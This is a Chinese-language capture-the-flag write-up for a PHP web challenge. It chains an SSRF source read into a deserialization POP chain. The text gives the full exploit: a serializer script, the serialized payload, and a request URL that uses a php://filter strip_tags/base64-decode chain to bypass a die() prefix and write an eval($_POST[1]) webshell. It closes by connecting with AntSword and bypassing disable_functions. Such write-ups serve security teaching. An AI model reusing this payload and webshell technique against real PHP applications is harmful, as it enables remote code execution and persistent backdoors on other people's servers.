稍微带点反序列化，稍微。

常规扫描robots.txt,给出提示star1.php。

很明显的ssrf嘛。直接读

star1.php?path=http://127.0.0.1/star1.php

<?php
error_reporting(0);
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {highlight_file(__FILE__);
} 
$flag='{Trump_:"fake_news!"}';class GWHT{public $hero;public function __construct(){$this->hero = new Yasuo;}public function __toString(){if (isset($this->hero)){return $this->hero->hasaki();}else{return "You don't look very happy";}}
}
class Yongen{ //flag.phppublic $file;public $text;public function __construct($file='',$text='') {$this -> file = $file;$this -> text = $text;}public function hasaki(){$d   = '<?php die("nononon");?>';$a= $d. $this->text;@file_put_contents($this-> file,$a);}
}
class Yasuo{public function hasaki(){return "I'm the best happy windy man";}
}?>

 也是很简单一个pop链，主要问题还是文件上传。而且这里没有给出参数，需要我们自己爆破。反正我是没爆破成功，不知道他们这么弄得，反序列化参数是c。

1.需要绕过die，因为他会将那个php代码进行拼接，导致无法执行我们写的木马。所以要将其除  

2.为了防止我们自己的php代码被剔除，所以要进行base64编码。

string.strip_tags:这个过滤器就比较有意思，用来处理掉读入的所有标签

<?php
class GWHT{public $hero;
}
class Yongen{ //flag.phppublic $file='';public $text='';
}$flag=new GWHT();
$flag->hero=new Yongen();
$flag->hero->file='php://filter/write=string.strip_tags|convert.base64-decode/resource=c.php';
$flag->hero->text='PD89IGV2YWwoJF9QT1NUWzFdKTs/Pg==';echo (serialize($flag));

payload:
O:4:"GWHT":1:{s:4:"hero";O:6:"Yongen":2:{s:4:"file";s:73:"php://filter/write=string.strip_tags|convert.base64-decode/resource=c.php";s:4:"text";s:32:"PD89IGV2YWwoJF9QT1NUWzFdKTs/Pg==";}}

入口:
star1.php?path=http://127.0.0.1/star1.php&c=O:4:"GWHT":1:{s:4:"hero";O:6:"Yongen":2:{s:4:"file";s:73:"php://filter/write=string.strip_tags|convert.base64-decode/resource=c.php";s:4:"text";s:32:"PD89IGV2YWwoJF9QT1NUWzFdKTs/Pg==";}}

 我使用蚁剑连了之后，还用disable_function绕了一下(flag.php是假的)